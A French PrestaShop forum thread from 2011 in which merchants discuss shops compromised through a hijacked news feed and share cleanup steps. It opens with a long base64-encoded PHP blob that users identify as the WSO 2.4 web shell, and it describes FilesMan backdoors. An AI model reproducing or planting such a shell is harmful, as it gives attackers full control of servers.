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'\x29\x29\x29\x3B","."); ?> Ce code retourne une page donnant bien trop d'informations sur le serveur title : domaine - WSO 2.4 H1 : Server security information Pourquoi ? Comment ? qu'es ce que WSO ? Merci Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Cette ligne complexe génère l'affichage d'un outil permettant d'obtenir de nombreuses informations techniques sur le serveur ou de lancer des commandes. Elle est simplement encodée Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 C'est pour cela que je propose depuis lundi l'installation du script CrawlProtect qui doit pourvoir éviter ce genre de chose, encore faut il que les modules Prestashop soient bien écrit pour ne pas se retrouver bloqué par ce script en faisant de belles bêtises comme appeler des url comme le module TNT : /modules/tnt/proxy/proxy.php?url=http://www.tnt.fr/public/b2c/relaisColis/recherche.do?code=75001 Je ne dit pas qu'il n'y a pas de hack, je dit juste qu'il faut donner du grain à moudre pour réussir à trouver la cause et pas seulement en venant pleurer. Edit , j'ai une autre question . Quid de ton module si l'appel à proxy.php existe mais qu'il est impossible de leurrer le proxy ? vais être détecté comme une faille alors que ce n'est pas le cas ? Je donne un exemple : /modules/tnt/proxy/proxy.php?url=recherche.do?code=75001 Dans ce cas précis, impossible d'utiliser mon module comme proxy car l'url est en dur dans proxy.php , seul l'envoi des données est fait et post filtré. Donc à nouveau , même question : sera-t-il bloqué par ton module ? Merci de préciser de quel module tu parles jeckyl car ça n'est pas le cas du mien (gratuit d'ailleurs) et j'aimerais éviter les amalgames inutiles . En revanche j'aimerais savoir, puisque tu en parles , ton module aurait il bloqué cette vulnérabilité ci ? Ca peut faire du poids dans la balance et même me décider moi même. Bonjour, J'ai beau relire ton post je n'y comprends rien. Dans un premier temps je précise qu'il ne s'agit nullement d'un module CrawlProtect est un script gratuit qui est reconnu sur Internet comme élément sécuritaire et permet de suivre un certains nombre de choses, je te laisse découvrir ce script pour répondre à tes questions car je ne les comprends pas. Ton histoire de proxy de filtrage et autre c'est du jargon de développeur surtout concernant ce fichier proxy que je ne connais pas et qui doit surement faire quelque chose de précis. Je rassure tout le monde le module en question n'est pas celui de Broceliande il est de /** * TNT module, Tnt.php * TNT Relais in order carrier and order history * @category modules * * @author Gregory Roussac <[email protected]> * @copyright interchouette.net * @version 1.0 * */ Ensuite je remonte juste une mauvaise pratique de développement. Mais peut être que je me trompe et qu'il; est tout à fait sécuritaire d'appeler des url complète en variable d'url, à toi comme dev de me répondre. 1 Link to comment Share on other sites More sharing options...
semor Posted August 24, 2011 Share Posted August 24, 2011 est-ce que quelqu'un rencontre des soucis avec les déclinaisons des produits en front office? j'ai bien peur que sur ma boutique le problème soit lié, tout fonctionnait encore parfaitement hier. Link to comment Share on other sites More sharing options...
Broceliande Posted August 24, 2011 Share Posted August 24, 2011 Ensuite je remonte juste une mauvaise pratique de développement. Mais peut être que je me trompe et qu'il; est tout à fait sécuritaire d'appeler des url complète en variable d'url, à toi comme dev de me répondre. Non tu as tout à fait raison , c'est une technique à proscrire absolument. Je parle de transmettre une url complète à un script proxy. Je me suis trompé en pensant que tu liais vers un module standalone. Je n'ai pas vu qu'il s'agissait de l'installation elle même et non un module installable. Ma question reste qu'il m'intéresserait de savoir si justement mon module serait ou non bloqué par ce script. Dans le sens ou même un appel propre et sauf pourrait créer un 'faux positif' Link to comment Share on other sites More sharing options...
1000 et 1 boutiques Posted August 24, 2011 Share Posted August 24, 2011 Hello tout le monde ! JE me pose quand même une question: Pourquoi Avast ne le détecte pas tout le temps ? ce matin ca detecte, puis plus et cet Apres-midi idem .... la kiss Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Ensuite je remonte juste une mauvaise pratique de développement. Mais peut être que je me trompe et qu'il; est tout à fait sécuritaire d'appeler des url complète en variable d'url, à toi comme dev de me répondre. Non tu as tout à fait raison , c'est une technique à proscrire absolument. Je parle de transmettre une url complète à un script proxy. Je me suis trompé en pensant que tu liais vers un module standalone. Je n'ai pas vu qu'il s'agissait de l'installation elle même et non un module installable. Ma question reste qu'il m'intéresserait de savoir si justement mon module serait ou non bloqué par ce script. Dans le sens ou même un appel propre et sauf pourrait créer un 'faux positif' Salut, je vais donc faire un test avec ton module. Link to comment Share on other sites More sharing options...
MangaH Posted August 24, 2011 Share Posted August 24, 2011 Bonjour tout le monde, Une bonne nouvelle, le problème est résolu et ne se propagera plus. Si votre boutique a été touchée, merci de nous contacter sur [email protected] L'équipe travaille actuellement sur un petit fix pour effacer les fichiers infectés. Nous vous donnerons plus de détails rapidement. De la part de la PrestaTeam merci de votre coopération et de votre patience. J'ai envoyé un email juste après ton message, mais toujours pas de réponse Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 On ne t'a pas oublié MangaH, la réponse va arriver . Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Il fallait bien qu'un jour le fait de mettre autant de pub et de link vers le store agace quelqu'un et qu'il s'en serve. Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Par contre je conseil à Prestashop de faire à mail à tous les utilisateur de la version 1.4 car je penses que la majorité des sites Prestashop sont touchés. Apprenez à communiquer, faute avoué à demi pardonnée. Link to comment Share on other sites More sharing options...
le-lutin31 Posted August 24, 2011 Share Posted August 24, 2011 Link to comment Share on other sites More sharing options...
Mpic Posted August 24, 2011 Share Posted August 24, 2011 Je viens de lire et je confirme bien pour le rss, sur mes sites je supprime toute référence à prestashop notamment sur la page d'accueil de l'administration. Ces boutiques là ne sont aucunement infectée. En revanche, pour des raisons de stabilité j'ai laissé les références sur de récentes boutiques toutes infectée. Déçu pour ce coup là. Indiquez un tutoriel pour nettoyer tout proprement svp. Link to comment Share on other sites More sharing options...
Patrick21 Posted August 24, 2011 Author Share Posted August 24, 2011 Bonjour, Plusieurs fois des informations de piratage, virus ou autre sont annoncés sur Prestashop et dans 99,99% c'st l'ordinateur de la personne qui travail sur le site qui est en cause par son FTP ou par une porte ouverte. Alors protégez vos PC avant tout (prenez un Mac, ) cette fois ci c'est 0.01% mais surement 99,99% des sites qui on accedé à l'admin hier qui sont touchés Patrick ps: comment on supprime ce flux rss, qui nous a pas informé de l'invasion du ver ? Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 En analysant avec Pierre-Yves les fichiers php cryptés dans upload et download, il semble que le but soit de hacké le serveur hébergeant le site. Ainsi les fichiers générés sont des filemanager donnant accès à l'ensemble de l'arborescence serveur. Et donc il peut modifier tout ce qu'il veut. Link to comment Share on other sites More sharing options...
Pierre-Yves Posted August 24, 2011 Share Posted August 24, 2011 Bonjour à tous, (Ca fait longtemps que je ne suis plus venu ici, mais rien de tel qu'un faille de sécurité pour faire un Comeback ) Ne recevant pas de réponse, et ayant plusieurs dizaines de sites touchés par cette faille (donc la plupart se sont fait hacker hier et aujourd'hui), je me suis mis moi même à chercher à la corriger . Comme l'a dis Jeckyl, après analyse, les fichiers ".php" qui se trouvent dans vos dossier "upload" et "download" sont des Files Manager (du nom de FilesMan, connu dans le monde du hack). Merci donc de les supprimer au plus vite... En effet le hacker peut via un mot de passe (très facile à trouver d'ailleurs) accéder à tous vos fichiers. De plus, si votre serveur n'est pas totalement sécurisé, les dégâts pourrait être bien pire que ce qu'il y a dans le footer . Voici une image pour vous montrer ce que cela donne Link to comment Share on other sites More sharing options...
le-lutin31 Posted August 24, 2011 Share Posted August 24, 2011 Bon j'aimerai comprendre comment un hacker peut infester la grande majorité des boutiques d'une communauté. Pour hacker, il faut avoir accès la boutique, au serveur au FTP. On peut pas virer du FTP un fichier JS comme ça. C'est infesté par quoi ? C'est Haché Oui ou Non ? Moi, je suis sous MAC et en version 1.3.7, j'ai rien. J'ai un domaine de libre, je mets une version 1.4.4 pour voir. Link to comment Share on other sites More sharing options...
ldldld Posted August 24, 2011 Share Posted August 24, 2011 bonjour comme indiqué j'ai ecris un mail pour signaler le probleme a cet instant aucune reponse j'ai telephone on m'a repondu vous inquitez pas ca va arrive (avec un ton ca me passe par dessus la jambe et des rigolades) et bien si desole je m'inquiete c'est simplement inadmissible Link to comment Share on other sites More sharing options...
Pierre-Yves Posted August 24, 2011 Share Posted August 24, 2011 Sans vouloir être désagréable, mais ce POST retient mon attention. Si je comprends bien, prestashop est à l'origine de l'envoi en masse de ce fichier ? Ca sous entends donc que votre système permet l’envoi de fichiers vers les boutiques installées avec ce cms sans action de notre part ? Ce qui voudrait dire que vous êtes capable sans notre consentement de modifier notre boutique ?On savais déjà que le système était bourré de trackers (je me demande ce qu'en penserait la CNIL d'ailleurs...) mais la, c'est le top du top...Une explication claire serait la bienvenue avant que l'on propage (ou pas) cette info douteuse. Je suis désolé mais Djolhan n'a pas tort en disant cela... Je n'ai jamais été vérifier vos moulinettes concernant les flux rss et autres que vous avez mis en place (par confiance en vous), mais j'avoue que c'est déplacé de votre part... 2 Link to comment Share on other sites More sharing options...
1000 et 1 boutiques Posted August 24, 2011 Share Posted August 24, 2011 Bonjour à tous, (Ca fait longtemps que je ne suis plus venu ici, mais rien de tel qu'un faille de sécurité pour faire un Comeback ) Ne recevant pas de réponse, et ayant plusieurs dizaines de sites touchés par cette faille (donc la plupart se sont fait hacker hier et aujourd'hui), je me suis mis moi même à chercher à la corriger . Comme l'a dis Jeckyl, après analyse, les fichiers ".php" qui se trouvent dans vos dossier "upload" et "download" sont des Files Manager (du nom de FilesMan, connu dans le monde du hack). Merci donc de les supprimer au plus vite... En effet le hacker peut via un mot de passe (très facile à trouver d'ailleurs) accéder à tous vos fichiers. De plus, si votre serveur n'est pas totalement sécurisé, les dégâts pourrait être bien pire que ce qu'il y a dans le footer . Voici une image pour vous montrer ce que cela donne Moi j'ai aucun de ses deux fichiers ... Link to comment Share on other sites More sharing options...
Carl Favre Posted August 24, 2011 Share Posted August 24, 2011 Bonjour, Vous trouverez toutes les explications dans le sujet et le moyen de le résoudre : Procédure de sécurité à lire attentivement Link to comment Share on other sites More sharing options...
le-lutin31 Posted August 24, 2011 Share Posted August 24, 2011 Merci Link to comment Share on other sites More sharing options...
Seo Organique Posted August 24, 2011 Share Posted August 24, 2011 Merci de votre reactivité Link to comment Share on other sites More sharing options...
Oron Posted August 24, 2011 Share Posted August 24, 2011 Il est où ce hacker que je lui botte les fesses !! Un de mes client a été atteint, je viens de trouver des fichier php avec des chiffres lettres de 3 km dans download et upload pas de her.php a la racine, j'ai appliquer le herfix il doit se passer quoi ? est-ce qu'on vois quelque chose coté web quand on va sur l'url de ce herfix ? smarty_2 qui a disparue!! Merci à la team ça c'est de la réaction !! une bises a tous et toutes de la team Link to comment Share on other sites More sharing options...
Benoit62200 Posted August 24, 2011 Share Posted August 24, 2011 Toute l'équipe travaille sur ce problème et fait tout pour le résoudre le plus rapidement possible. Dès que nous aurons plus d'informations nous ne manquerons pas de les communiquer. Soyez assurés que c'est notre priorité numéro 1 de résoudre ce problème. Aucun email.. un message très discret dans le blog.. faire une faute, arrive même aux plus grands ! Mais l'important c'est de la corriger le plus rapidement possible. Ce qui a été fait.. et maintenant.. du bout des lèvres.. on ne communique pas ! Il est plus là d’après moi le scandale.. j'ai été impacté hier.. il y a une entreprise..des emplois.. des clients.. des dettes et des charges !! Qu'est ce qui pourrait se passer si des gens sont impactés et ne le savent pas ? " une infraction électronique ".. façon poète de parler de piratage, l'équipe douée en informatique ne semble pas l'être en communication. Il est bien beau de parader avec les 80 000 installations.. maintenant il faut avertir.. envoyer un email à chacun et prendre des responsabilités. Pour ceux que ça intéresse et qui sont passés à côté : http://www.prestashop.com/blog/article/procedure_de_securite_a_lire_attentivement/ 2 Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 Bonjour, Vous trouverez toutes les explications dans le sujet et le moyen de le résoudre : Procédure de sécurité à lire attentivement Merci, et la correction parle d'elle-même dans le code. En revanche, PrestaShop ne s'est toujours pas expliqué sur comment ce "script" mal intentionné a pu se propager grâce à une simple "lecture" d'actualités ? Si la source du problème vient d'une propagation depuis un service PrestaShop, comment se fait-il que nous ne soyons pas informés que PrestaShop a la possibilité d'écrire en dur (fichiers et répertoires) à distance sur nos hébergements privés ? L'explication morale et technique n'a toujours pas été divulguée à la communauté. Bien cordialement 3 Link to comment Share on other sites More sharing options...
Olecorre Posted August 24, 2011 Share Posted August 24, 2011 En revanche, PrestaShop ne s'est toujours pas expliqué sur comment ce "script" mal intentionné a pu se propager grâce à une simple "lecture" d'actualités ? Très bonne question 1 Link to comment Share on other sites More sharing options...
Benoit62200 Posted August 24, 2011 Share Posted August 24, 2011 "L'explication morale et technique n'a toujours pas été divulguée à la communauté." Pas qu'un peu.. c'est à la limite de la légalité.. voir même passé de l'autre côté 2 Link to comment Share on other sites More sharing options...
Raphaël Malié Posted August 24, 2011 Share Posted August 24, 2011 Bonsoir, il me semble qu'il y a suffisamment d'informations ici pour peu qu'on lise entre les lignes : Le site officiel prestashop.com a été victime d’une infraction électronique entrainant le détournement d’un script de mise à jour d’actualité, visible depuis le back office des boutiques PrestaShop. Vous avez constaté que le "virus" se propageait sur les boutiques y compris les nouvelles, vous pouvez en déduire comment si vous avez quelques connaissances en informatique, on évite de donner trop de détails pour des raisons évidentes de sécurité. Mais je peux vous certifier que la Prestateam n'a ni le pouvoir, ni l'envie d'écrire à distance dans votre Prestashop. Et si jamais vous tombiez sur un moyen de le faire, n'hésitez pas à le signaler il serait aussitôt corrigé (m'enfin on a bien vérifier ). Link to comment Share on other sites More sharing options...
DevNet Posted August 24, 2011 Share Posted August 24, 2011 Et si jamais vous tombiez sur un moyen de le faire, n'hésitez pas à le signaler il serait aussitôt corrigé (m'enfin on a bien vérifier ). J'ai déjà fait des propositions concernant d'éventuelles améliorations, sans aucune écoute de la part de PrestaTeam. Mais je peux vous en donner une nouvelle qui serait un nette amélioration sur la sécurité de chaque boutique. Certains scripts utilisés par le noyau sont des sources de projet indépendant. Je pense en autre à TinyMCE. Tout son usage n'est utile que depuis le back-office, pour l'édition de texte enrichi et surtout la gestion de l'upload. Pourtant cet addon est présent à la racine de chaque boutique. Ce qui veut dire que le script est certes fiable aujourd'hui, mais reste lui même OpenSources, et est donc une proie facile aux possibilités et découvertes d'injections. Il serait bien plus judicieux de placer cet addon dans le "répertoire personnalisé" de l'administration. Bien cordialement Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Sauf que le débat a déjà été abordé sur ce forum sur l'ensemble des tracker, script et autre ping sur les boutiques. Vous collectez des information lors de l'installation, suite à cela un serveur vient vérifier régulièrement la présence de la boutique puis vous avez vos information commerciales partout dans Prestashop, vous diffusez tellement qu'une partie du temps de chargement du BO est perdu dans ces message ce qui est dommage pour l'utilisateur final. Après on apprend qu'un hack a eu lieu sur une des fonctionnalité publicitaire mis en place, donc on est en droit de se demander la limite que vous ne franchissez pas alors qu'on peut la franchir. 1 Link to comment Share on other sites More sharing options...
Oron Posted August 24, 2011 Share Posted August 24, 2011 En analysant avec Pierre-Yves les fichiers php cryptés dans upload et download, il semble que le but soit de hacké le serveur hébergeant le site. Ainsi les fichiers générés sont des filemanager donnant accès à l'ensemble de l'arborescence serveur. Et donc il peut modifier tout ce qu'il veut. Quel sont les dégâts qu'il peut faire sur le serveur ? comme a cité Jeckyl J'ai deux client qui ont été infecter dont un site qui est même pas en production !! du moins pas connus sur le web!! Et ce hacker il est possible de savoir qui c'est ? Link to comment Share on other sites More sharing options...
traivore Posted August 24, 2011 Share Posted August 24, 2011 Bon tout ça n'est pas très rassurant. Ni pour ceux, comme moi, qui ont travaillé comme des malades pour essayer de mettre en place une boutique avec PS, ni pour vous autres qui concevez des modules, des thèmes et je ne sais quoi adaptés à ce CMS. Je viens d'appliquer le patch que je n'ai eu que parce que j'ai pensé à m'abonner aux différentes rubriques du forum. Mais qu'en est-il de ceux, nombreux, qui ignorent même qu'ils risquent d'être infectés et qui sont passés à côté de ce topic? Autre chose, je suis très intrigué (et je pèse mes mots) par la source même de cette attaque liée vraisemblablement au flux RSS de PS. Si je comprend bien les mots des différents participants, et le silence pesant qui en a suivi..., ce flux, en plus de constituer une faille de sécurité, permettrait une intrusion dans la boutique, de sorte que la confidentialité des informations détenues par le vendeur ne serait plus garantie? A ce stade, ma question est simple : quelle est l'utilité de ce flux pour nous autres simples utilisateurs de PS? S'il n'est pas indispensable, comment couper ce lien? Et dernière chose, comment supprimer toute référence à PS dans les fichiers? Merci... Link to comment Share on other sites More sharing options...
Benoit62200 Posted August 24, 2011 Share Posted August 24, 2011 Je rejoins Jeckyl sur " donc on est en droit de se demander la limite que vous ne franchissez pas alors qu'on peut la franchir. " Link to comment Share on other sites More sharing options...
Djolhan Posted August 24, 2011 Share Posted August 24, 2011 Je crois que Jeckyl et Devnet ont résumé mes pensés. Vous êtes de plus en plus bordeline chez prestashop, voir même vous avez franchit certaines limites de déontologie. Je me rappelle que vous nous avez fait tout un flan parceque nous avions mis une image au tout début du regretté prestastore pour savoir qui installait nos modules, alors que votre équipe fait bien pire, elle a installé un tracker qui permet de récolter email et adresse du site à des fins statistiques sans même en informer l'utilisateur. Je rappelle d'ailleurs que nous devrions en être informé et avoir accès à la modification de ces informations. (CF la CNIL) Et aujourd'hui, vos propres intrusions sur les boutiques installées impactent lourdement la sécurité des serveurs qui hébergent votre solution et vous passez l'info seulement sur le forum... Certains n'auront même pas l'idée de passer ici, d'autres pire ne se rendront compte de cette faille que dans plusieurs semaines... Quels dégâts collatéraux trouvera t'on sur les serveurs hébergeant les sites piratés? Je trouverai ca aberrant de la part de votre équipe si aucune information en newsletter n'est envoyé rapidement à ce sujet. Vous avez fait une erreur, une lourde erreur et j’espère vraiment que vous n'allez pas que sortir un fix, mais une information clair et précise à tous les utilisateurs de prestashop ! 2 Link to comment Share on other sites More sharing options...
quentin audrain Posted August 24, 2011 Share Posted August 24, 2011 Aucun email.. un message très discret dans le blog.. faire une faute, arrive même aux plus grands ! Mais l'important c'est de la corriger le plus rapidement possible. Ce qui a été fait.. et maintenant.. du bout des lèvres.. on ne communique pas ! Bonjour, Nous préparons actuellement un e-mail, qui sera envoyé à toutes les personnes susceptibles d'avoir été touchées par le problème. Il est important pour nous d'être sûr que toutes les boutiques affectées puissent corriger le problème rapidement. Si vous avez des questions n'hésitez pas à nous contacter (01 40 18 30 04 ou par mail). Le fix étant maintenant mis a disposition, il sera plus facile pour l'équipe de vous aider. Cdlt, Link to comment Share on other sites More sharing options...
Pierre-Yves Posted August 24, 2011 Share Posted August 24, 2011 Quel sont les dégâts qu'il peut faire sur le serveur ? comme a cité JeckylJ'ai deux client qui ont été infecter dont un site qui est même pas en production !! du moins pas connus sur le web!!Et ce hacker il est possible de savoir qui c'est ? Ça peut aller jusqu'à la prise de contrôle totale du serveur... Maintenant, en théorie si vous êtes sur un serveur mutualisé, où que vous êtes sur un dédié infogéré, il n'y a normalement pas de soucis à se faire. Par contre, si vous hébergez votre site sur votre propre serveur et que vous gérez vous même ce serveur, alors là cela dépend de vos compétences PS : Pourquoi ne pas mettre le fix via le flux justement??? Comme cela vous êtes certains que les boutiques contaminées sont réparées 1 Link to comment Share on other sites More sharing options...
Oron Posted August 24, 2011 Share Posted August 24, 2011 Malheureusement ou heureusement je gère mon propre serveur tout neuf de 1 mois, neuf niveau matériel et installation. s'il arrive quelque chose à mon serveur je vais piquer une grosse colère !! Contre qui je sais pas ! Comme tout le monde j'aimerai plus de précision Link to comment Share on other sites More sharing options...
a-prods Posted August 24, 2011 Share Posted August 24, 2011 A voir ce post (et les autres d'ailleurs) on s’aperçoit que pas mal d'informations transitent entre nos boutiques et prestashop / prestatore. Je ne pense pas que cela soit correct / légal de faire se genre de choses sans l'accord préalable de l’intéresser ni même l'en informer. Ce qui devait arriver arriva... les boutique sont hackées par ce biais!!! Perso, j'essaye d'enlever à chaque install tous les envois de fichier vers PS. Ceci dit, je ne suis pas de vraiment tout enlever. Je propose/demande d'afficher la marche à suivre de manière à éviter tout transfert d'infos d'un sens comme dans l'autre. Je ne parle pas des annotation de copyright en commentaire dans le haut des fichiers, mais des fonctions appelants le site prestashop.com ou prestastore. Je ne suis pas sur que ce forum soit l'endroit pour expliquer comment "nettoyer" nos boutiques mais les propriétaires de blog sont les bienvenus (avis perso). 1 Link to comment Share on other sites More sharing options...
le-lutin31 Posted August 24, 2011 Share Posted August 24, 2011 Des boutiques hackées, depuis le fournisseur de ces boutiques, c'est inadmissible. Nous sommes des commerçants avec une clientèle qui nous fait confiance, un site hacké affecte notre crédibilité et notre sérieux aux yeux de notre clientèle. Sur nos sites se trouvent des informations confidentielles sur nos clients, informations, que personnellement je protège et ne divulgue jamais conformément aux lois françaises. Tout comme Oron, j'ai mon serveur depuis 1 mois, si un virus plante mon serveur avec 9 sites dessus, je ne saurais pas réparer, je devrais faire appel à un informaticien, quant à mes clients ils se feront la malle, qui me dédommagera pour le préjudice ? À la direction de Prestashop, la loi Chatel de 2008 oblige les fournisseurs à fournir un produit conforme à l'annonce faite et à l'attente du client, dans le cas contraire, soit il y a remboursement, soit c'est la plainte. Bien que les boutiques prestashop soient gratuites cette loi vous concerne aussi, car un commerçant qui bousille un serveur ou qui perd ses clients est en droit de vous attaquer en justice. À titre d'info, avant de piquer nos coordonnées pour des fichages ou des statistiques, vous devez nous en informer sinon c'est illégal. J'avais déjà vu que lors de ma première boutique prestabox, que prestashop avait enregistré mon domaine à son nom, ça aussi c'est illégal et je l'avais signalé. Merci pour le mail d'info. bien que je ne soit pas touchée, je suis en colère et solidaire avec ceux qui se sont fait hacké. je souhaite que cela serve de leçon à prestashop et que plus jamais cela ne se reproduise. 1 Link to comment Share on other sites More sharing options...
Atch Posted August 24, 2011 Share Posted August 24, 2011 Ouah quelle lecture... Faut que ça se passe pendant mes congés et sans accès pc Bah j espère que ça peut attendre encore quelques jours et ne pas faire trop de dégâts ... J ai appris la news par le mail informatif Prestashop... Enfin une comm intéressante... Dommage que c est pour annoncer ce genre de truc... A quand un prestashop Lite sans toutes "ces c........." Revenir aux sources de l open source et arrêter le matraquage commercial ( que se soit dans la solution même ou dans les mails newsletter ou autre)! V++ Atch 3 Link to comment Share on other sites More sharing options...
Benoit62200 Posted August 24, 2011 Share Posted August 24, 2011 "Bah j espère que ça peut attendre encore quelques jours et ne pas faire trop de dégâts ..." demande à la team.. ils sont peut être capable de te corriger ça sans que tu communiques tes infos Link to comment Share on other sites More sharing options...
Oron Posted August 24, 2011 Share Posted August 24, 2011 (edited) Questions importante suite à un site d'un client inaccessible : Si on retélécharge les dossier et fichiers prestashop faut-il remettre le herfix.php ? Est-ce que ce malware ou virus fait-il des inscriptions dans la base de donnée ? Si,quelqu'un peut répondre ce serait sympa ! Un site fonctionne mais il y a le lien du clickmemk fileave com dans quel fichier ?? Merci Jeckyl pour la réponse ci-dessous Edited August 24, 2011 by Oron (see edit history) Link to comment Share on other sites More sharing options...
jeckyl Posted August 24, 2011 Share Posted August 24, 2011 Il faut repasser le fix sur toute nouvelle boutique jusqu'à la prochaine version. Le fichier footer.tpl est modifié pour mettre les liens. Pas d'inscription dans la base de données remontées à ce jour. Link to comment Share on other sites More sharing options...
labelandco Posted August 24, 2011 Share Posted August 24, 2011 Perso ma boutique n'est pas affectée. Link to comment Share on other sites More sharing options...
